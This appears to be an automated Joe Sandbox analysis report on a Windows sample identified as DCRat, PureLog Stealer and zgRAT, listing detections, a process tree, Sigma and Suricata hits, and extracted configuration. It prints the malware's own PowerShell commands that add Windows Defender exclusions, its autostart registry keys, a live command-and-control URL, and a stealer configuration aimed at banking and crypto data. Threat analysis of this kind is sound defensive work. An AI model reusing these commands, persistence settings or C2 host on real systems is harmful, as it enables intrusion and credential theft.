Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DCobxod.exe

Overview

General Information

Sample name:DCobxod.exe
Analysis ID:1590003
MD5:bc4a8996f18f14f3c77fff13fd23b00d
SHA1:431779aa67e97a32824956d9f3c9122a8340486b
SHA256:58040788269169456e7831099188a99796227cac63cc28771496d9f97204b895
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DCobxod.exe (PID: 5972 cmdline: "C:\Users\user\Desktop\DCobxod.exe" MD5: BC4A8996F18F14F3C77FFF13FD23B00D)
    • wscript.exe (PID: 4424 cmdline: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • intoHostperf.exe (PID: 5828 cmdline: "C:\Browserhost/intoHostperf.exe" MD5: CADD0C3B32099635F889BA630C4697F4)
          • csc.exe (PID: 6672 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 2928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 7084 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 6768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • powershell.exe (PID: 2888 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3964 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4396 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7260 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7404 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7532 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • Conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • upfc.exe (PID: 4796 cmdline: C:\Recovery\upfc.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • upfc.exe (PID: 2724 cmdline: C:\Recovery\upfc.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • explorer.exe (PID: 3176 cmdline: C:\Users\Default\NetHood\explorer.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • LaSqLWtOcizKrlm.exe (PID: 6160 cmdline: C:\Browserhost\LaSqLWtOcizKrlm.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • LaSqLWtOcizKrlm.exe (PID: 1644 cmdline: C:\Browserhost\LaSqLWtOcizKrlm.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • winlogon.exe (PID: 3872 cmdline: "C:\Users\All Users\SoftwareDistribution\winlogon.exe" MD5: CADD0C3B32099635F889BA630C4697F4)
  • winlogon.exe (PID: 768 cmdline: "C:\Users\All Users\SoftwareDistribution\winlogon.exe" MD5: CADD0C3B32099635F889BA630C4697F4)
  • explorer.exe (PID: 7604 cmdline: C:\Users\Default\NetHood\explorer.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • intoHostperf.exe (PID: 7636 cmdline: C:\Browserhost\intoHostperf.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • intoHostperf.exe (PID: 7656 cmdline: C:\Browserhost\intoHostperf.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-l6SyUDRxjaImQy2wOPXg", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
DCobxod.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    DCobxod.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Browserhost\LaSqLWtOcizKrlm.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Browserhost\LaSqLWtOcizKrlm.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Browserhost\LaSqLWtOcizKrlm.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Browserhost\LaSqLWtOcizKrlm.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: intoHostperf.exe PID: 5828JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.DCobxod.exe.6c0e6ef.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.DCobxod.exe.6c0e6ef.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.DCobxod.exe.6c0e6ef.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.DCobxod.exe.6c0e6ef.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.DCobxod.exe.75296ef.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Execution from Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Default\NetHood\explorer.exe, CommandLine: C:\Users\Default\NetHood\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\NetHood\explorer.exe, ProcessId: 3176, ProcessName: explorer.exe
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetFilename: C:\Users\Default\NetHood\explorer.exe
                                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe", EventID: 13, EventType: SetValue, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LaSqLWtOcizKrlm
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', ProcessId: 2888, ProcessName: powershell.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Default\NetHood\explorer.exe, CommandLine: C:\Users\Default\NetHood\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\NetHood\explorer.exe, ProcessId: 3176, ProcessName: explorer.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", ProcessId: 6672, ProcessName: csc.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', ProcessId: 2888, ProcessName: powershell.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DCobxod.exe", ParentImage: C:\Users\user\Desktop\DCobxod.exe, ParentProcessId: 5972, ParentProcessName: DCobxod.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" , ProcessId: 4424, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetFilename: C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', ProcessId: 2888, ProcessName: powershell.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\All Users\SoftwareDistribution\winlogon.exe", CommandLine: "C:\Users\All Users\SoftwareDistribution\winlogon.exe", CommandLine|base64offset|contains: , Image: C:\ProgramData\SoftwareDistribution\winlogon.exe, NewProcessName: C:\ProgramData\SoftwareDistribution\winlogon.exe, OriginalFileName: C:\ProgramData\SoftwareDistribution\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\All Users\SoftwareDistribution\winlogon.exe", ProcessId: 3872, ProcessName: winlogon.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", ProcessId: 6672, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-13T13:19:54.776592+010020480951A Network Trojan was detected192.168.2.549883104.21.16.180TCP
                                    2025-01-13T13:20:13.438185+010020480951A Network Trojan was detected192.168.2.549975104.21.16.180TCP
                                    2025-01-13T13:20:22.485135+010020480951A Network Trojan was detected192.168.2.549976104.21.16.180TCP
                                    2025-01-13T13:20:49.141323+010020480951A Network Trojan was detected192.168.2.549977104.21.16.180TCP
                                    2025-01-13T13:20:57.985056+010020480951A Network Trojan was detected192.168.2.549978104.21.16.180TCP
                                    2025-01-13T13:21:03.341431+010020480951A Network Trojan was detected192.168.2.549979104.21.16.180TCP
                                    2025-01-13T13:21:07.889970+010020480951A Network Trojan was detected192.168.2.549980104.21.16.180TCP
                                    2025-01-13T13:21:15.125698+010020480951A Network Trojan was detected192.168.2.549981104.21.16.180TCP
                                    2025-01-13T13:21:20.531985+010020480951A Network Trojan was detected192.168.2.549982104.21.16.180TCP
                                    2025-01-13T13:21:27.422609+010020480951A Network Trojan was detected192.168.2.549983104.21.16.180TCP
                                    2025-01-13T13:21:32.953796+010020480951A Network Trojan was detected192.168.2.549984104.21.16.180TCP
                                    2025-01-13T13:21:39.938198+010020480951A Network Trojan was detected192.168.2.549985104.21.16.180TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: DCobxod.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Recovery\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Browserhost\intoHostperf.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Found malware configuration
                                    Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-l6SyUDRxjaImQy2wOPXg", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Users\user\Desktop\CdhQCsIu.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\DaJYXsXp.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\GTYGJoJn.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\NzFoXiJZ.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\QQZxdmXS.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\TBFNkAhL.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\WuUwVxTJ.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\ZuimMgmz.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\pEXJLSDT.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\xpPRZvtG.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\zmrZuvIB.logReversingLabs: Detection: 20%
                                    Multi AV Scanner detection for submitted file
                                    Source: DCobxod.exeVirustotal: Detection: 55%Perma Link
                                    Source: DCobxod.exeReversingLabs: Detection: 47%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\upfc.exeJoe Sandbox ML: detected
                                    Source: C:\Browserhost\intoHostperf.exeJoe Sandbox ML: detected
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeJoe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: DCobxod.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
